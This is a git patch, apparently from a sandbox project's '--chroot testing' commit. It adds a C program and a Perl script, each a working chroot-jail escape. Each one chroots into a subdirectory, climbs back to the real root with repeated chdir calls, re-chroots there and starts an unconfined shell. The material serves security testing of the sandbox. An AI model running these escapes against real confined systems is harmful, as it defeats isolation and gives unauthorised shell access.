From 1cb8ef59101eeaa1b325fb7f881ded148b0de1d3 Mon Sep 17 00:00:00 2001
From: netblue30 <netblue30@yahoo.com>
Date: Sat, 31 Oct 2015 13:07:38 -0400
Subject: --chroot testing

---
 src/tools/unchroot    | Bin 0 -> 9720 bytes
 src/tools/unchroot.c  | 125 ++++++++++++++++++++++++++++++++++++++++++++++++++
 src/tools/unchroot.pl |  33 +++++++++++++
 3 files changed, 158 insertions(+)
 create mode 100755 src/tools/unchroot
 create mode 100644 src/tools/unchroot.c
 create mode 100755 src/tools/unchroot.pl

(limited to 'src/tools')

diff --git a/src/tools/unchroot b/src/tools/unchroot
new file mode 100755
index 000000000..d32ce2682
Binary files /dev/null and b/src/tools/unchroot differ
diff --git a/src/tools/unchroot.c b/src/tools/unchroot.c
new file mode 100644
index 000000000..21731296e
--- /dev/null
+++ b/src/tools/unchroot.c
@@ -0,0 +1,125 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+
+/* 
+ ** You should set NEED_FCHDIR to 1 if the chroot() on your
+ ** system changes the working directory of the calling
+ ** process to the same directory as the process was chroot()ed
+ ** to.
+ **
+ ** It is known that you do not need to set this value if you
+ ** running on Solaris 2.7 and below.
+ **
+ */
+#define NEED_FCHDIR 0
+
+#define TEMP_DIR "waterbuffalo"
+
+/* Break out of a chroot() environment in C */
+
+int main() {
+	int x;					  /* Used to move up a directory tree */
+	int done=0;				  /* Are we done yet ? */
+#ifdef NEED_FCHDIR
+	int dir_fd;				  /* File descriptor to directory */
+#endif
+	struct stat sbuf;			  /* The stat() buffer */
+
+	/* 
+	 ** First we create the temporary directory if it doesn't exist
+	 */
+	if (stat(TEMP_DIR,&sbuf)<0) {
+		if (errno==ENOENT) {
+			if (mkdir(TEMP_DIR,0755)<0) {
+				fprintf(stderr,"Failed to create %s - %s\n", TEMP_DIR,
+					strerror(errno));
+				exit(1);
+			}
+		}
+		else {
+			fprintf(stderr,"Failed to stat %s - %s\n", TEMP_DIR,
+				strerror(errno));
+			exit(1);
+		}
+	}
+	else if (!S_ISDIR(sbuf.st_mode)) {
+		fprintf(stderr,"Error - %s is not a directory!\n",TEMP_DIR);
+		exit(1);
+	}
+
+#ifdef NEED_FCHDIR
+	/* 
+	 ** Now we open the current working directory
+	 **
+	 ** Note: Only required if chroot() changes the calling program's
+	 **       working directory to the directory given to chroot().
+	 **
+	 */
+	if ((dir_fd=open(".",O_RDONLY))<0) {
+		fprintf(stderr,"Failed to open \".\" for reading - %s\n",
+			strerror(errno));
+		exit(1);
+	}
+#endif
+
+	/* 
+	 ** Next we chroot() to the temporary directory
+	 */
+	if (chroot(TEMP_DIR)<0) {
+		fprintf(stderr,"Failed to chroot to %s - %s\n",TEMP_DIR,
+			strerror(errno));
+		exit(1);
+	}
+
+#ifdef NEED_FCHDIR
+	/* 
+	 ** Partially break out of the chroot by doing an fchdir()
+	 **
+	 ** This only partially breaks out of the chroot() since whilst
+	 ** our current working directory is outside of the chroot() jail,
+	 ** our root directory is still within it. Thus anything which refers
+	 ** to "/" will refer to files under the chroot() point.
+	 **
+	 ** Note: Only required if chroot() changes the calling program's
+	 **       working directory to the directory given to chroot().
+	 **
+	 */
+	if (fchdir(dir_fd)<0) {
+		fprintf(stderr,"Failed to fchdir - %s\n",
+			strerror(errno));
+		exit(1);
+	}
+	close(dir_fd);
+#endif
+
+	/* 
+	 ** Completely break out of the chroot by recursing up the directory
+	 ** tree and doing a chroot to the current working directory (which will
+	 ** be the real "/" at that point). We just do a chdir("..") lots of
+	 ** times (1024 times for luck :). If we hit the real root directory before
+	 ** we have finished the loop below it doesn't matter as .. in the root
+	 ** directory is the same as . in the root.
+	 **
+	 ** We do the final break out by doing a chroot(".") which sets the root
+	 ** directory to the current working directory - at this point the real
+	 ** root directory.
+	 */
+	for(x=0;x<1024;x++) {
+		chdir("..");
+	}
+	chroot(".");
+
+	/* 
+	 ** We're finally out - so exec a shell in interactive mode
+	 */
+	if (execl("/bin/sh","-i",NULL)<0) {
+		fprintf(stderr,"Failed to exec - %s\n",strerror(errno));
+		exit(1);
+	}
+}
diff --git a/src/tools/unchroot.pl b/src/tools/unchroot.pl
new file mode 100755
index 000000000..bd30ffe76
--- /dev/null
+++ b/src/tools/unchroot.pl
@@ -0,0 +1,33 @@
+#!/usr/bin/perl -w
+use strict;
+# unchroot.pl Dec 2007
+# http://pentestmonkey.net/blog/chroot-breakout-perl
+
+# This script may be used for legal purposes only.
+
+# Go to the root of the jail
+chdir "/";
+
+# Open filehandle to root of jail
+opendir JAILROOT, "." or die "ERROR: Couldn't get file handle to root of jailn";
+
+# Create a subdir, move into it
+mkdir "mysubdir";
+chdir "mysubdir";
+
+# Lock ourselves in a new jail
+chroot ".";
+
+# Use our filehandle to get back to the root of the old jail
+chdir(*JAILROOT);
+
+# Get to the real root
+while ((stat("."))[0] != (stat(".."))[0] or (stat("."))[1] != (stat(".."))[1]) {
+        chdir "..";
+}
+
+# Lock ourselves in real root - so we're not really in a jail at all now
+chroot ".";
+
+# Start an un-jailed shell
+system("/bin/sh");
-- 
cgit v1.2.3-54-g00ecf